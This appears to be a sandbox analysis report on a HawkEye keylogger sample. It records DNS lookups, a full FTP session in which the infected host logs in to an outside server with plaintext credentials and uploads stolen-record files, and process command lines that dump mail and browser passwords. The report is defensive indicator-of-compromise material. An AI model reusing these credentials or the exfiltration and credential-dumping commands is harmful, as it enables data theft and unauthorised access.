Aug 10, 2021 16:48:16.855520010 CEST  49745        21         192.168.2.3      45.141.152.18
Aug 10, 2021 16:48:16.873044014 CEST  21           49745      45.141.152.18    192.168.2.3
Aug 10, 2021 16:48:16.873241901 CEST  49745        21         192.168.2.3      45.141.152.18
Aug 10, 2021 16:48:16.890853882 CEST  21           49745      45.141.152.18    192.168.2.3
Aug 10, 2021 16:48:16.891865015 CEST  49746        62025      192.168.2.3      45.141.152.18
Aug 10, 2021 16:48:16.909324884 CEST  62025        49746      45.141.152.18    192.168.2.3
Aug 10, 2021 16:48:16.909648895 CEST  49746        62025      192.168.2.3      45.141.152.18
Aug 10, 2021 16:48:16.909986019 CEST  49745        21         192.168.2.3      45.141.152.18
Aug 10, 2021 16:48:16.927596092 CEST  21           49745      45.141.152.18    192.168.2.3
Aug 10, 2021 16:48:16.928159952 CEST  49746        62025      192.168.2.3      45.141.152.18
Aug 10, 2021 16:48:16.945511103 CEST  62025        49746      45.141.152.18    192.168.2.3
Aug 10, 2021 16:48:16.945641994 CEST  49746        62025      192.168.2.3      45.141.152.18

UDP Packets

Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Aug 10, 2021 16:46:51.992109060 CEST  50620        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:46:52.027792931 CEST  53           50620      8.8.8.8          192.168.2.3
Aug 10, 2021 16:46:52.786812067 CEST  64938        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:46:52.819618940 CEST  53           64938      8.8.8.8          192.168.2.3
Aug 10, 2021 16:46:53.580915928 CEST  60152        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:46:53.606440067 CEST  53           60152      8.8.8.8          192.168.2.3
Aug 10, 2021 16:46:53.824304104 CEST  57544        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:46:53.858824015 CEST  53           57544      8.8.8.8          192.168.2.3
Aug 10, 2021 16:46:54.412156105 CEST  55984        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:46:54.446171999 CEST  53           55984      8.8.8.8          192.168.2.3
Aug 10, 2021 16:46:55.296931982 CEST  64185        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:46:55.324888945 CEST  53           64185      8.8.8.8          192.168.2.3
Aug 10, 2021 16:46:55.987725019 CEST  65110        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:46:56.015455961 CEST  53           65110      8.8.8.8          192.168.2.3
Aug 10, 2021 16:46:57.095588923 CEST  58361        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:46:57.123378992 CEST  53           58361      8.8.8.8          192.168.2.3
Aug 10, 2021 16:46:57.848203897 CEST  63492        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:46:57.880265951 CEST  53           63492      8.8.8.8          192.168.2.3
Aug 10, 2021 16:46:58.790199041 CEST  60831        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:46:58.816679955 CEST  53           60831      8.8.8.8          192.168.2.3
Aug 10, 2021 16:46:59.740109921 CEST  60100        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:46:59.768263102 CEST  53           60100      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:00.503175020 CEST  53195        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:00.534950972 CEST  53           53195      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:01.173685074 CEST  50141        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:01.207612038 CEST  53           50141      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:02.121170044 CEST  53023        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:02.156781912 CEST  53           53023      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:02.892385006 CEST  49563        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:02.925177097 CEST  53           49563      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:03.236361980 CEST  51352        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:03.269021034 CEST  53           51352      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:03.596029043 CEST  59349        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:03.629024982 CEST  53           59349      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:03.645652056 CEST  57084        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:03.679981947 CEST  53           57084      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:03.688853979 CEST  58823        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:03.713882923 CEST  53           58823      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:04.500855923 CEST  57568        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:04.538271904 CEST  53           57568      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:05.334511042 CEST  50540        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:05.367644072 CEST  53           50540      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:05.991631985 CEST  54366        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:06.017340899 CEST  53           54366      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:06.736274958 CEST  53034        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:06.764453888 CEST  53           53034      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:24.103511095 CEST  57762        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:24.140403032 CEST  53           57762      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:28.506854057 CEST  55435        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:28.542598009 CEST  53           55435      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:47.617676020 CEST  50713        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:47.650687933 CEST  53           50713      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:48.165157080 CEST  56132        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:48.240035057 CEST  53           56132      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:48.895066977 CEST  58987        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:49.128357887 CEST  53           58987      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:49.561104059 CEST  56579        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:49.597024918 CEST  53           56579      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:49.789418936 CEST  60633        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:49.822038889 CEST  53           60633      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:50.608778000 CEST  61292        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:50.642127991 CEST  53           61292      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:51.540833950 CEST  63619        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:51.576519966 CEST  53           63619      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:52.423635006 CEST  64938        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:52.460983038 CEST  53           64938      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:54.526727915 CEST  61946        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:54.562757015 CEST  53           61946      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:56.360480070 CEST  64910        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:56.399250031 CEST  53           64910      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:57.974577904 CEST  52123        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:58.009871006 CEST  53           52123      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:58.143307924 CEST  56130        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:58.179583073 CEST  53           56130      8.8.8.8          192.168.2.3
Aug 10, 2021 16:47:58.667742968 CEST  56338        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:47:58.702274084 CEST  53           56338      8.8.8.8          192.168.2.3
Aug 10, 2021 16:48:11.134829044 CEST  59420        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:48:11.170924902 CEST  53           59420      8.8.8.8          192.168.2.3
Aug 10, 2021 16:48:16.639065981 CEST  58784        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:48:16.686578035 CEST  53           58784      8.8.8.8          192.168.2.3
Aug 10, 2021 16:48:36.402700901 CEST  63978        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:48:36.506305933 CEST  53           63978      8.8.8.8          192.168.2.3
Aug 10, 2021 16:48:38.583419085 CEST  62938        53         192.168.2.3      8.8.8.8
Aug 10, 2021 16:48:38.617878914 CEST  53           62938      8.8.8.8          192.168.2.3

DNS Queries

Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                     Type                  Class
Aug 10, 2021 16:47:03.236361980 CEST  192.168.2.3  8.8.8.8  0x1c9c    Standard query (0)  www.google.com           A (IP address)        IN (0x0001)
Aug 10, 2021 16:47:58.143307924 CEST  192.168.2.3  8.8.8.8  0x3295    Standard query (0)  90.168.9.0.in-addr.arpa  PTR (Pointer record)  IN (0x0001)
Aug 10, 2021 16:48:16.639065981 CEST  192.168.2.3  8.8.8.8  0xa1a3    Standard query (0)  ftp.badonfashoin.com     A (IP address)        IN (0x0001)

DNS Answers

Timestamp                             Source IP  Dest IP      Trans ID  Reply Code      Name                     CName  Address          Type                  Class
Aug 10, 2021 16:47:03.269021034 CEST  8.8.8.8    192.168.2.3  0x1c9c    No error (0)    www.google.com                  142.250.185.196  A (IP address)        IN (0x0001)
Aug 10, 2021 16:47:58.179583073 CEST  8.8.8.8    192.168.2.3  0x3295    Name error (3)  90.168.9.0.in-addr.arpa  none   none             PTR (Pointer record)  IN (0x0001)
Aug 10, 2021 16:48:16.686578035 CEST  8.8.8.8    192.168.2.3  0xa1a3    No error (0)    ftp.badonfashoin.com            45.141.152.18    A (IP address)        IN (0x0001)

HTTPS Packets

Timestamp: Aug 10, 2021 16:47:03.378601074 CEST
Source IP: 142.250.185.196  Source Port: 443  Dest IP: 192.168.2.3  Dest Port: 49715
Certificate chain:
    Subject: CN=www.google.com
    Issuer: CN=GTS CA 1C3, O=Google Trust Services LLC, C=US
    Not Before: Mon Jul 12 05:48:19 CEST 2021
    Not After: Mon Oct 04 05:48:18 CEST 2021

    Subject: CN=GTS CA 1C3, O=Google Trust Services LLC, C=US
    Issuer: CN=GTS Root R1, O=Google Trust Services LLC, C=US
    Not Before: Thu Aug 13 02:00:42 CEST 2020
    Not After: Thu Sep 30 02:00:42 CEST 2027

    Subject: CN=GTS Root R1, O=Google Trust Services LLC, C=US
    Issuer: CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE
    Not Before: Fri Jun 19 02:00:42 CEST 2020
    Not After: Fri Jan 28 01:00:42 CET 2028
JA3 SSL Client Fingerprint: 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 54328bd36c14bd82ddaa0c04b25ed9ad

FTP Packets

Timestamp                             Source Port  Dest Port  Source IP        Dest IP          Commands
Aug 10, 2021 16:48:16.748107910 CEST  21           49745      45.141.152.18    192.168.2.3      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                 220-You are user number 6 of 50 allowed.
                                                                                                 220-Local time is now 10:48. Server port: 21.
                                                                                                 220-This is a private system - No anonymous login
                                                                                                 220-IPv6 connections are also welcome on this server.
                                                                                                 220 You will be disconnected after 15 minutes of inactivity.
Aug 10, 2021 16:48:16.749362946 CEST  49745        21         192.168.2.3      45.141.152.18    USER logs@badonfashoin.com
Aug 10, 2021 16:48:16.767363071 CEST  21           49745      45.141.152.18    192.168.2.3      331 User logs@badonfashoin.com OK. Password required
Aug 10, 2021 16:48:16.767621994 CEST  49745        21         192.168.2.3      45.141.152.18    PASS sKsYZiIYQn6y
Aug 10, 2021 16:48:16.819124937 CEST  21           49745      45.141.152.18    192.168.2.3      230 OK. Current restricted directory is /
Aug 10, 2021 16:48:16.837003946 CEST  21           49745      45.141.152.18    192.168.2.3      504 Unknown command
Aug 10, 2021 16:48:16.837682962 CEST  49745        21         192.168.2.3      45.141.152.18    PWD
Aug 10, 2021 16:48:16.855254889 CEST  21           49745      45.141.152.18    192.168.2.3      257 "/" is your current location
Aug 10, 2021 16:48:16.855520010 CEST  49745        21         192.168.2.3      45.141.152.18    TYPE I
Aug 10, 2021 16:48:16.873044014 CEST  21           49745      45.141.152.18    192.168.2.3      200 TYPE is now 8-bit binary
Aug 10, 2021 16:48:16.873241901 CEST  49745        21         192.168.2.3      45.141.152.18    PASV
Aug 10, 2021 16:48:16.890853882 CEST  21           49745      45.141.152.18    192.168.2.3      227 Entering Passive Mode (45,141,152,18,242,73)
Aug 10, 2021 16:48:16.909986019 CEST  49745        21         192.168.2.3      45.141.152.18    STOR HawkEye_Keylogger_Stealer_Records_632922 8.10.2021 4:55:54 PM.txt
Aug 10, 2021 16:48:16.927596092 CEST  21           49745      45.141.152.18    192.168.2.3      150 Accepted data connection
Aug 10, 2021 16:48:16.967284918 CEST  21           49745      45.141.152.18    192.168.2.3      226-File successfully transferred
                                                                                                 226 0.040 seconds (measured here), 37.78 Kbytes per second

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 16:47:00
Start date: 10/08/2021
Path: C:\Users\user\Desktop\FukQGQj7cl.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\FukQGQj7cl.exe'
Imagebase: 0xa70000
File size: 1245696 bytes
MD5 hash: 83F58ECF0778E3B0ACCA8497DF23EF23
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 16:47:38
Start date: 10/08/2021
Path: C:\Users\user\AppData\Local\Temp\InstallUtil.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\InstallUtil.exe
Imagebase: 0xd60000
File size: 41064 bytes
MD5 hash: EFEC8C379D165E3F33B536739AEE26A3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, Author: Joe Security
• Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000010.00000002.501178621.00000000084C0000.00000004.00000001.sdmp, Author: Arnim Rupp
• Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000010.00000002.501112721.0000000008460000.00000004.00000001.sdmp, Author: Arnim Rupp
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 0%, Metadefender
• Detection: 0%, ReversingLabs
Reputation: moderate

General

Start time: 16:48:03
Start date: 10/08/2021
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Imagebase: 0x400000
File size: 1171592 bytes
MD5 hash: C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000015.00000002.358708597.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 16:48:03
Start date: 10/08/2021
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Imagebase: 0x400000
File size: 1171592 bytes
MD5 hash: C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000016.00000002.364855957.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

Disassembly

Code Analysis